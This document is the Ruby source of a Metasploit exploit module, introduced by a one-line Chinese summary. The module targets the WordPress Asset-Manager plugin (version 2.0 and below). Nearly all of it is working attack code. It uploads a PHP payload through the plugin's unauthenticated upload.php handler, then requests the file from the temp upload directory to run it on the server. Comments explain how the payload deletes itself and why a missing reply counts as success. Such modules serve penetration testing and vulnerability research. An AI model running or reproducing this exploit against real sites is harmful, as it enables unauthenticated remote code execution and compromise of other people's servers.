这个 Metasploit 模块利用在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞：插件的 upload.php 允许未经身份验证的用户将任意 PHP 文件上传到一个临时目录，从而导致远程执行任意代码。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

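class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # PhpEXE provides get_write_exec_payload (used in #exploit). The garbled
  # ':hpEXE' seen in reposts of this module is a mangled '::PhpEXE'.
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads a PHP payload through the plugin's unauthenticated upload.php
  # handler, then requests it from the plugin's temp upload directory so the
  # web server executes it.
  #
  # Calls fail_with(Exploit::Failure::UnexpectedReply) when the upload
  # response is missing, non-200, or does not contain the uploaded file name,
  # or when the trigger request comes back with a non-200 status.
  def exploit
    uri = target_uri.path
    # Build a new string instead of appending to the one target_uri returned.
    uri += '/' unless uri.end_with?('/')
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # unlink_self makes the dropped PHP file remove itself after it runs, so
    # no web shell is left behind in the temp directory.
    php_payload = get_write_exec_payload(:unlink_self => true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strip the CRLF that Rex::MIME::Message#to_s emits ahead of the first
    # "--_Part_" boundary (kept from the original module; presumably the
    # upload handler rejects the leading blank line -- confirm).
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Success is judged by the file name appearing in the response body. Use a
    # substring test: interpolating the name into a regex would make its '.'
    # match any character.
    if res.nil? || res.code != 200 || !res.body.include?(payload_name)
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    # Hard-coded to the default WordPress uploads location; a customised
    # upload_path puts the file elsewhere and this GET will not reach it.
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    # A nil response is tolerated on purpose: a reverse/staged payload usually
    # never sends an HTTP reply, so only an explicit non-200 counts as failure.
    if res && res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end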
|